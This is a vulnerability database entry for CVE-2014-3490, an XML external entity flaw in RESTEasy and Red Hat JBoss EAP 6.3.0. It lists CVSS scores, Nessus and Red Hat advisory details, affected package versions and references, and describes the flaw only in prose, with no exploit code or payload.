ID CVE-2014-3490
Summary RESTEasy 2.3.1 before 2.3.8.SP2 and 3.x before 3.0.9, as used in Red Hat JBoss Enterprise Application Platform (EAP) 6.3.0, does not disable external entities when the resteasy.document.expand.entity.references parameter is set to false, which allows remote attackers to read arbitrary files and have other unspecified impact via unspecified vectors, related to an XML External Entity (XXE) issue. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-0818.
References
Vulnerable Configurations
  • Red Hat JBoss Enterprise Application Platform (EAP) 6.3.0
    cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.3.0
  • RedHat RESTeasy 3.0 beta1
    cpe:2.3:a:redhat:resteasy:3.0:beta1
  • RedHat RESTeasy 3.0 beta2
    cpe:2.3:a:redhat:resteasy:3.0:beta2
  • RedHat RESTeasy 3.0 beta3
    cpe:2.3:a:redhat:resteasy:3.0:beta3
  • RedHat RESTeasy 3.0 beta4
    cpe:2.3:a:redhat:resteasy:3.0:beta4
  • RedHat RESTeasy 3.0 beta5
    cpe:2.3:a:redhat:resteasy:3.0:beta5
  • RedHat RESTeasy 3.0 beta6
    cpe:2.3:a:redhat:resteasy:3.0:beta6
  • RedHat RESTeasy 3.0 release candidate 1
    cpe:2.3:a:redhat:resteasy:3.0:rc1
CVSS
Base: 7.5 (as of 20-08-2014 - 10:47)
Impact:
Exploitability:
Access
VectorComplexityAuthentication
NETWORK LOW NONE
Impact
ConfidentialityIntegrityAvailability
PARTIAL PARTIAL PARTIAL
nessus via4
  • NASL family Red Hat Local Security Checks
    NASL id REDHAT-RHSA-2014-1040.NASL
    description Updated Red Hat JBoss Enterprise Application Platform 6.3.0 packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7. Red Hat Product Security has rated this update as having Moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7. It was found that the fix for CVE-2012-0818 was incomplete: external parameter entities were not disabled when the resteasy.document.expand.entity.references parameter was set to false. A remote attacker able to send XML requests to a RESTEasy endpoint could use this flaw to read files accessible to the user running the application server, and potentially perform other more advanced XXE attacks. (CVE-2014-3490) This issue was discovered by David Jorm of Red Hat Product Security. All users of Red Hat JBoss Enterprise Application Platform 6.3.0 on Red Hat Enterprise Linux 5, 6, and 7 are advised to upgrade to these updated packages. The JBoss server process must be restarted for the update to take effect.
    last seen 2019-02-21
    modified 2019-01-02
    plugin id 77178
    published 2014-08-13
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=77178
    title RHEL 5 / 6 / 7 : JBoss EAP (RHSA-2014:1040)
  • NASL family Oracle Linux Local Security Checks
    NASL id ORACLELINUX_ELSA-2014-1011.NASL
    description From Red Hat Security Advisory 2014:1011 : Updated resteasy-base packages that fix one security issue are now available for Red Hat Enterprise Linux 7. The Red Hat Security Response Team has rated this update as having Moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. RESTEasy contains a JBoss project that provides frameworks to help build RESTful Web Services and RESTful Java applications. It is a fully certified and portable implementation of the JAX-RS specification. It was found that the fix for CVE-2012-0818 was incomplete: external parameter entities were not disabled when the resteasy.document.expand.entity.references parameter was set to false. A remote attacker able to send XML requests to a RESTEasy endpoint could use this flaw to read files accessible to the user running the application server, and potentially perform other more advanced XXE attacks. (CVE-2014-3490) This issue was discovered by David Jorm of Red Hat Product Security. All resteasy-base users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.
    last seen 2019-02-21
    modified 2019-01-02
    plugin id 77011
    published 2014-08-06
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=77011
    title Oracle Linux 7 : resteasy-base (ELSA-2014-1011)
  • NASL family Red Hat Local Security Checks
    NASL id REDHAT-RHSA-2014-1011.NASL
    description Updated resteasy-base packages that fix one security issue are now available for Red Hat Enterprise Linux 7. The Red Hat Security Response Team has rated this update as having Moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. RESTEasy contains a JBoss project that provides frameworks to help build RESTful Web Services and RESTful Java applications. It is a fully certified and portable implementation of the JAX-RS specification. It was found that the fix for CVE-2012-0818 was incomplete: external parameter entities were not disabled when the resteasy.document.expand.entity.references parameter was set to false. A remote attacker able to send XML requests to a RESTEasy endpoint could use this flaw to read files accessible to the user running the application server, and potentially perform other more advanced XXE attacks. (CVE-2014-3490) This issue was discovered by David Jorm of Red Hat Product Security. All resteasy-base users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.
    last seen 2019-02-21
    modified 2019-01-02
    plugin id 77014
    published 2014-08-06
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=77014
    title RHEL 7 : resteasy-base (RHSA-2014:1011)
  • NASL family Fedora Local Security Checks
    NASL id FEDORA_2014-16845.NASL
    description Security fix for CVE-2014-3490 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen 2019-02-21
    modified 2015-10-19
    plugin id 83066
    published 2015-04-27
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=83066
    title Fedora 20 : resteasy-3.0.6-3.fc20 (2014-16845)
  • NASL family CentOS Local Security Checks
    NASL id CENTOS_RHSA-2014-1011.NASL
    description Updated resteasy-base packages that fix one security issue are now available for Red Hat Enterprise Linux 7. The Red Hat Security Response Team has rated this update as having Moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. RESTEasy contains a JBoss project that provides frameworks to help build RESTful Web Services and RESTful Java applications. It is a fully certified and portable implementation of the JAX-RS specification. It was found that the fix for CVE-2012-0818 was incomplete: external parameter entities were not disabled when the resteasy.document.expand.entity.references parameter was set to false. A remote attacker able to send XML requests to a RESTEasy endpoint could use this flaw to read files accessible to the user running the application server, and potentially perform other more advanced XXE attacks. (CVE-2014-3490) This issue was discovered by David Jorm of Red Hat Product Security. All resteasy-base users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.
    last seen 2019-02-21
    modified 2018-11-28
    plugin id 77031
    published 2014-08-07
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=77031
    title CentOS 7 : resteasy-base (CESA-2014:1011)
redhat via4
advisories
  • bugzilla
    id 1107901
    title CVE-2014-3490 RESTEasy: XXE via parameter entities
    oval
    AND
    • OR
      • comment Red Hat Enterprise Linux 7 Client is installed
        oval oval:com.redhat.rhsa:tst:20140675001
      • comment Red Hat Enterprise Linux 7 Server is installed
        oval oval:com.redhat.rhsa:tst:20140675002
      • comment Red Hat Enterprise Linux 7 Workstation is installed
        oval oval:com.redhat.rhsa:tst:20140675003
      • comment Red Hat Enterprise Linux 7 ComputeNode is installed
        oval oval:com.redhat.rhsa:tst:20140675004
    • OR
      • AND
        • comment resteasy-base is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011005
        • comment resteasy-base is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011006
      • AND
        • comment resteasy-base-atom-provider is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011009
        • comment resteasy-base-atom-provider is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011010
      • AND
        • comment resteasy-base-jackson-provider is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011017
        • comment resteasy-base-jackson-provider is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011018
      • AND
        • comment resteasy-base-javadoc is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011021
        • comment resteasy-base-javadoc is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011022
      • AND
        • comment resteasy-base-jaxb-provider is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011025
        • comment resteasy-base-jaxb-provider is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011026
      • AND
        • comment resteasy-base-jaxrs is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011023
        • comment resteasy-base-jaxrs is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011024
      • AND
        • comment resteasy-base-jaxrs-all is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011011
        • comment resteasy-base-jaxrs-all is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011012
      • AND
        • comment resteasy-base-jaxrs-api is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011019
        • comment resteasy-base-jaxrs-api is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011020
      • AND
        • comment resteasy-base-jettison-provider is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011013
        • comment resteasy-base-jettison-provider is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011014
      • AND
        • comment resteasy-base-providers-pom is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011015
        • comment resteasy-base-providers-pom is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011016
      • AND
        • comment resteasy-base-tjws is earlier than 0:2.3.5-3.el7_0
          oval oval:com.redhat.rhsa:tst:20141011007
        • comment resteasy-base-tjws is signed with Red Hat redhatrelease2 key
          oval oval:com.redhat.rhsa:tst:20141011008
    rhsa
    id RHSA-2014:1011
    released 2014-08-06
    severity Moderate
    title RHSA-2014:1011: resteasy-base security update (Moderate)
  • rhsa
    id RHSA-2014:1039
  • rhsa
    id RHSA-2014:1040
  • rhsa
    id RHSA-2014:1298
  • rhsa
    id RHSA-2015:0125
  • rhsa
    id RHSA-2015:0675
  • rhsa
    id RHSA-2015:0720
  • rhsa
    id RHSA-2015:0765
rpms
  • resteasy-base-0:2.3.5-3.el7_0
  • resteasy-base-atom-provider-0:2.3.5-3.el7_0
  • resteasy-base-jackson-provider-0:2.3.5-3.el7_0
  • resteasy-base-javadoc-0:2.3.5-3.el7_0
  • resteasy-base-jaxb-provider-0:2.3.5-3.el7_0
  • resteasy-base-jaxrs-0:2.3.5-3.el7_0
  • resteasy-base-jaxrs-all-0:2.3.5-3.el7_0
  • resteasy-base-jaxrs-api-0:2.3.5-3.el7_0
  • resteasy-base-jettison-provider-0:2.3.5-3.el7_0
  • resteasy-base-providers-pom-0:2.3.5-3.el7_0
  • resteasy-base-tjws-0:2.3.5-3.el7_0
refmap via4
bid 69058
confirm
misc https://github.com/ronsigal/Resteasy/commit/9b7d0f574cafdcf3bea5428f3145ab4908fc6d83
secunia 60019
Last major update 06-01-2017 - 22:00
Published 19-08-2014 - 14:55
Last modified 21-03-2019 - 10:22
Back to Top